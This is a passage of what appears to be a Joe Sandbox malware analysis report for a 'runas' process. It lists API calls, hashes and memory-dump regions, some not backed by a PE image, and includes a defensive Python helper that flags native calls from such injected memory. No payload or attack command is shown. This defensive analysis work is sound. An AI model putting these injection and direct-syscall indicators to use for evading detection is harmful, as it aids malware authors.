• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: c9d66426c858a190bcf0ba12ecc6669d26d004e9f3ccde46ee16ef4e20202938
• Instruction ID: ac561ca8021f93c719f7cb8139ff7f9efb999dfbaf7e21b30c1bc8ba793822d7
• Opcode Fuzzy Hash: c9d66426c858a190bcf0ba12ecc6669d26d004e9f3ccde46ee16ef4e20202938
                                                                                                              • Instruction Fuzzy Hash: BC310AB5A00249AFDB14DF98D881EEFB7B8EF8C714F108219F918A7341D770A941CBA5
                                                                                                              APIs
                                                                                                              • NtAllocateVirtualMemory.NTDLL(0050205E,?,FECAB67C,00000000,00000004,00003000,?,?,?,?,?,0051827F,0050205E,?,0051B7EE,0051827F), ref: 005199C5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2167126740-0
                                                                                                              • Opcode ID: 7105b53df433aa1ebde741e09c5036428d86e6b2d46f5145a4f3265435cb635f
                                                                                                              • Instruction ID: 64b0cf7fb47a5472352910bb9ee0ad7224774ac410f38b642ca090e0d00ccf53
                                                                                                              • Opcode Fuzzy Hash: 7105b53df433aa1ebde741e09c5036428d86e6b2d46f5145a4f3265435cb635f
                                                                                                              • Instruction Fuzzy Hash: 15215EB5601249AFDB10DF98CC41EEF77B8EF89700F10850AFD08A7241D774A951CBA1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: c26d3cd6e071d1d6abc6115a1b7b9aac1fec755140daddfe6fc85a1820dbb4ed
                                                                                                              • Instruction ID: f16f6a90003df97ebb6ee4f8199aae3b63fa51717897af8e039b08551f817c95
                                                                                                              • Opcode Fuzzy Hash: c26d3cd6e071d1d6abc6115a1b7b9aac1fec755140daddfe6fc85a1820dbb4ed
                                                                                                              • Instruction Fuzzy Hash: B811E371501648BBE620EBA4CC06FFB776CEF85714F104509FA04AB181D7717985C7A5
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 005197D4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 3bf9c33cf7409904d2fd51a1091b6da9a301a50e1818314538d4cbce849de183
                                                                                                              • Instruction ID: fc3a450ac7fd2bd170469de49009ce86a6814a4ce2101c00aa1bd074cbf9e4e9
                                                                                                              • Opcode Fuzzy Hash: 3bf9c33cf7409904d2fd51a1091b6da9a301a50e1818314538d4cbce849de183
                                                                                                              • Instruction Fuzzy Hash: 5DE04F322442047BD110AA6ACC02FDB776CDBC6755F00851AFA48A7242C771794087E4
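The three native calls recorded in the blocks above (NtReadFile at 005196F3, NtAllocateVirtualMemory at 005199C5, NtClose at 005197D4) all originate from the dump at 004F0000, which the report marks "based on PE: false", i.e. executable memory that is not backed by an image on disk; the InitializeThunk entries that follow come from the PE-backed dump at 044B0000 and carry no API records. The following triage helper, an added Python example that is not part of the Joe Sandbox report or its tooling, groups the listing's API records by source region and flags native calls issued from non-PE-backed memory, which is the shape behind the report's "direct / indirect Syscall" signature. The sample input is a constructed subset of the records above. The constant table is a hint only: Joe Sandbox prints the stack slots present at the call rather than a decoded argument list, so which slot is which argument is my assumption; the adjacent values 00000004 and 00003000 happen to match PAGE_READWRITE and MEM_COMMIT|MEM_RESERVE, and 001F0001 matches MUTANT_ALL_ACCESS.

```python
"""Triage helper for a Joe Sandbox function listing (added example, not Joe Sandbox code).

Groups the 'APIs' records by their 'Memory Dump Source' region and reports
native (Nt*) calls that come from memory not backed by a PE image.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: the API and Memory Dump Source records from the listing
# above, reduced to the lines this parser consumes.
SAMPLE = """\
APIs
• NtReadFile.NTDLL(?,?,FECAB67C,?,?,?,?,?,?), ref: 005196F3
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
APIs
• NtAllocateVirtualMemory.NTDLL(0050205E,?,FECAB67C,00000000,00000004,00003000,?,?,?,?,?,0051827F,0050205E,?,0051B7EE,0051827F), ref: 005199C5
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
APIs
• NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 005197D4
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
APIs
Memory Dump Source
• Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
"""

API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)$")

# Well-known NT constants. The report prints raw stack slots at the call site,
# not decoded arguments, so a match is a hint for the analyst, not proof.
KNOWN_CONSTANTS = {
    0x3000: "MEM_COMMIT|MEM_RESERVE",
    0x1000: "MEM_COMMIT",
    0x2000: "MEM_RESERVE",
    0x04: "PAGE_READWRITE",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x1F0001: "MUTANT_ALL_ACCESS",
    0x104: "MAX_PATH",
}


@dataclass
class ApiCall:
    name: str        # e.g. NtAllocateVirtualMemory
    module: str      # e.g. NTDLL
    args: list       # stack slots as printed; None where the report shows '?'
    ref: int         # address of the call site inside the dumped region


@dataclass
class Region:
    base: int
    dump_name: str
    pe_backed: bool  # the report's 'based on PE' flag
    calls: list = field(default_factory=list)


def parse_listing(text):
    """Return {base_address: Region}; API records are attached to the next Source File line."""
    regions, pending = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            name, module, arg_text, ref = m.groups()
            slots = [None if a.strip() == "?" else int(a, 16) for a in arg_text.split(",")] if arg_text else []
            pending.append(ApiCall(name, module, slots, int(ref, 16)))
            continue
        m = SRC_RE.match(line)
        if m:
            dump, base_hex, pe = m.groups()
            region = regions.setdefault(int(base_hex, 16), Region(int(base_hex, 16), dump, pe == "true"))
            region.calls.extend(pending)
            pending = []
    return regions


def decode_constants(call):
    """Map slot index -> constant name for slots whose value matches a known constant (hint only)."""
    return {i: KNOWN_CONSTANTS[v] for i, v in enumerate(call.args) if v in KNOWN_CONSTANTS}


def findings(regions):
    """One finding per region that issues Nt* calls without being backed by a PE image."""
    out = []
    for base, region in sorted(regions.items()):
        nt_calls = [c for c in region.calls if c.name.startswith("Nt") and c.module.upper() == "NTDLL"]
        if region.pe_backed or not nt_calls:
            continue
        names = ", ".join(f"{c.name}@{c.ref:08X}" for c in nt_calls)
        hints = "; ".join(f"{c.name}: {list(decode_constants(c).values())}" for c in nt_calls if decode_constants(c))
        out.append(f"region {base:08X} (not PE-backed): {len(nt_calls)} native call(s) [{names}] hints: {hints}")
    return out


if __name__ == "__main__":
    for line in findings(parse_listing(SAMPLE)):
        print(line)
```

Run against a whole report export, the same grouping separates code that lives in mapped images from code that was written into fresh memory, and the call-site addresses (ref) give the offsets to inspect in the corresponding .sdmp dump.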
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 4fdda6b9ab1658639adaf3a47f3b4a1db62f9190dd121d3bb2250311d7d98268
                                                                                                              • Instruction ID: 45ae9712cec45a2bad26bc24b9ce22089e32e7148ace342bf72ba12012cc5c07
                                                                                                              • Opcode Fuzzy Hash: 4fdda6b9ab1658639adaf3a47f3b4a1db62f9190dd121d3bb2250311d7d98268
                                                                                                              • Instruction Fuzzy Hash: 36900261601500436144715848044066195ABE1316399C115B0559560C8618D955B269
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c2542130782ae9834355d18be421ee0090db5814993bf9863286cfad9632b5ee
                                                                                                              • Instruction ID: da61772bf63f64defa5e102aa9fa55f915db05155c6518bbfff8f4d0cfc0dac8
                                                                                                              • Opcode Fuzzy Hash: c2542130782ae9834355d18be421ee0090db5814993bf9863286cfad9632b5ee
                                                                                                              • Instruction Fuzzy Hash: 1C90023160580013B144715848845464195ABE0316B59C011F0429554C8A14DA567361
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: ba0c723fa76b0ef282d0423d99773d682d42ae85ac22795c700571bec9b44ed6
                                                                                                              • Instruction ID: 0d46f65ee71b0cae64d9be97814b6a81f0636c625cc198862e19e7bf212094e3
                                                                                                              • Opcode Fuzzy Hash: ba0c723fa76b0ef282d0423d99773d682d42ae85ac22795c700571bec9b44ed6
                                                                                                              • Instruction Fuzzy Hash: D490023120148803F1147158840474A01959BD0316F5DC411B4429658D8695D9917121
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 761eb1ea7339d19d3dd74d2ae51ec3117713c8088cd79c244101181915c2853a
                                                                                                              • Instruction ID: d356947948551b17fe5c0b6d4ce0ec92a9769ae70421e4921675d5cd8d7ffbc6
                                                                                                              • Opcode Fuzzy Hash: 761eb1ea7339d19d3dd74d2ae51ec3117713c8088cd79c244101181915c2853a
                                                                                                              • Instruction Fuzzy Hash: DF90023120140843F10471584404B4601959BE0316F59C016B0129654D8615D9517521
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 882e8692bdd61cd2498563797a57c129c0b0ded88b6125645b6b67fa98875fca
                                                                                                              • Instruction ID: c4266a55ae6fe5b24e4a990c69acd933f021b0f35815719dccccff06961e8675
                                                                                                              • Opcode Fuzzy Hash: 882e8692bdd61cd2498563797a57c129c0b0ded88b6125645b6b67fa98875fca
                                                                                                              • Instruction Fuzzy Hash: 9990023120140403F1047598540864601959BE0316F59D011B5029555EC665D9917131
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d0e53273a3c89b52a9d34443c7e011b210c8ca9024df59e3057e0c3cbc177701
                                                                                                              • Instruction ID: fcb5e0e1d488d64e5551fb409b18f10eed62e7d649f6fa937bd985bafa88629e
                                                                                                              • Opcode Fuzzy Hash: d0e53273a3c89b52a9d34443c7e011b210c8ca9024df59e3057e0c3cbc177701
                                                                                                              • Instruction Fuzzy Hash: 7190022921340003F1847158540860A01959BD1217F99D415B001A558CC915D9697321
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 85d32e4c175b3aa4d0eccfece38c3059f88edff62216f2ec5b7e42867235afb1
                                                                                                              • Instruction ID: 218f2e35639e4c75ac31b5f4b1fa2baa83b7e861c7a142d0eec285252db6da5f
                                                                                                              • Opcode Fuzzy Hash: 85d32e4c175b3aa4d0eccfece38c3059f88edff62216f2ec5b7e42867235afb1
                                                                                                              • Instruction Fuzzy Hash: 0A90022130140003F144715854186064195EBE1316F59D011F0419554CD915D9567222
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2728481a5f565f91543f18b6f5abae8908ea6618e7161b80bbadbf09adf99b05
                                                                                                              • Instruction ID: 25ecf390784053fec7ccb6d3d8b0e4656e41fe6a53ba1d5ce23c95a0697c799a
                                                                                                              • Opcode Fuzzy Hash: 2728481a5f565f91543f18b6f5abae8908ea6618e7161b80bbadbf09adf99b05
                                                                                                              • Instruction Fuzzy Hash: 96900221242441537549B15844045074196ABE0256799C012B1419950C8526E956F621
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: bb967f8c92928b2207bc6010ba68847709ef909c993a3ac4170f44aacee31856
                                                                                                              • Instruction ID: e23305e6e39b5a278607c849af1e2effe11b71d8b1691ab37c7077612871e38a
                                                                                                              • Opcode Fuzzy Hash: bb967f8c92928b2207bc6010ba68847709ef909c993a3ac4170f44aacee31856
                                                                                                              • Instruction Fuzzy Hash: D590023120140413F1157158450470701999BD0256F99C412B0429558D9656DA52B121
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: aac8ae14f95f57e6e3bd8450010b8df0df45538b3d36de9c1e1901e08edcb04b
                                                                                                              • Instruction ID: 76b345ba41ae322e4ad0a4a9710a3c310735b3e57ad598379f52aedc6d7e429a
                                                                                                              • Opcode Fuzzy Hash: aac8ae14f95f57e6e3bd8450010b8df0df45538b3d36de9c1e1901e08edcb04b
                                                                                                              • Instruction Fuzzy Hash: F290026120180403F1447558480460701959BD0317F59C011B2069555E8A29DD517135
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 1891d4babb2d77f27013ea5d39b269951e5547e0f69c9d7b5f9ad379e8c8de75
                                                                                                              • Instruction ID: d6a699d390f694db1d5bd6ce7fb358daeee116b8bd4b522d37b18e3b41ac2099
                                                                                                              • Opcode Fuzzy Hash: 1891d4babb2d77f27013ea5d39b269951e5547e0f69c9d7b5f9ad379e8c8de75
                                                                                                              • Instruction Fuzzy Hash: F390022160140503F10571584404616019A9BD0256F99C022B1029555ECA25DA92B131
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: f48de0c29518653c6a7ec98e210b5cc270d8f8b220913cdc5ef3eb13c2258545
                                                                                                              • Instruction ID: b1f3592564fb48b5cb61e5fe8c3911d0a363e4a44ceb408ca28436bd8e9b63aa
                                                                                                              • Opcode Fuzzy Hash: f48de0c29518653c6a7ec98e210b5cc270d8f8b220913cdc5ef3eb13c2258545
                                                                                                              • Instruction Fuzzy Hash: 4790026134140443F10471584414B060195DBE1316F59C015F1069554D8619DD527126
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 99fc6342af0242a505f9c4ac6801c21d58a190c50719e0bb9522f3bcc5ec3883
                                                                                                              • Instruction ID: 418c4adfac024a06c20530e9c64cc0be6e7aa7cf835f7a6e5fbc321d7ca415d3
                                                                                                              • Opcode Fuzzy Hash: 99fc6342af0242a505f9c4ac6801c21d58a190c50719e0bb9522f3bcc5ec3883
                                                                                                              • Instruction Fuzzy Hash: D7900221211C0043F20475684C14B0701959BD0317F59C115B0159554CC915D9617521
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8a0225dc2883d584f1b364f9ff7017d352c525720d27f6b1e1903b98b4328052
                                                                                                              • Instruction ID: 0afdb0537b4ae6efc435512f5d883b466c9a84344eb73843eea2ec06c1a31ca3
                                                                                                              • Opcode Fuzzy Hash: 8a0225dc2883d584f1b364f9ff7017d352c525720d27f6b1e1903b98b4328052
                                                                                                              • Instruction Fuzzy Hash: F2900221601400436144716888449064195BFE1226759C121B099D550D8559D9657665
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: de56911a1b24eae7068f54205c488e384f8685bfc149af719681a3077cc1fb80
                                                                                                              • Instruction ID: bcea3a3c0185a6b1f6a67a7c91568c7f9f7b6eb3a1556a17f6acb563adc57e37
                                                                                                              • Opcode Fuzzy Hash: de56911a1b24eae7068f54205c488e384f8685bfc149af719681a3077cc1fb80
                                                                                                              • Instruction Fuzzy Hash: 35900225211400032109B558070450701D69BD5366359C021F101A550CD621D9617121
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: e9150a74b8b4a586524e1597d61098d0be29da7416f80641e47f977f331f7139
                                                                                                              • Instruction ID: 8c61b5ed54f22242550236e1dbd5de14ced795ecbf28a582f62377afceff8b28
                                                                                                              • Opcode Fuzzy Hash: e9150a74b8b4a586524e1597d61098d0be29da7416f80641e47f977f331f7139
                                                                                                              • Instruction Fuzzy Hash: 1E900225221400032149B558060450B05D5ABD6366399C015F141B590CC621D9657321
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 2773588e70b3221ef7e17e832d2d785019bd62c4e6500ad2945a9354d63a380e
                                                                                                              • Instruction ID: a6ae747fcb0396347e41478de7f599ccb5306697836d13a3fd28f0636597fcec
                                                                                                              • Opcode Fuzzy Hash: 2773588e70b3221ef7e17e832d2d785019bd62c4e6500ad2945a9354d63a380e
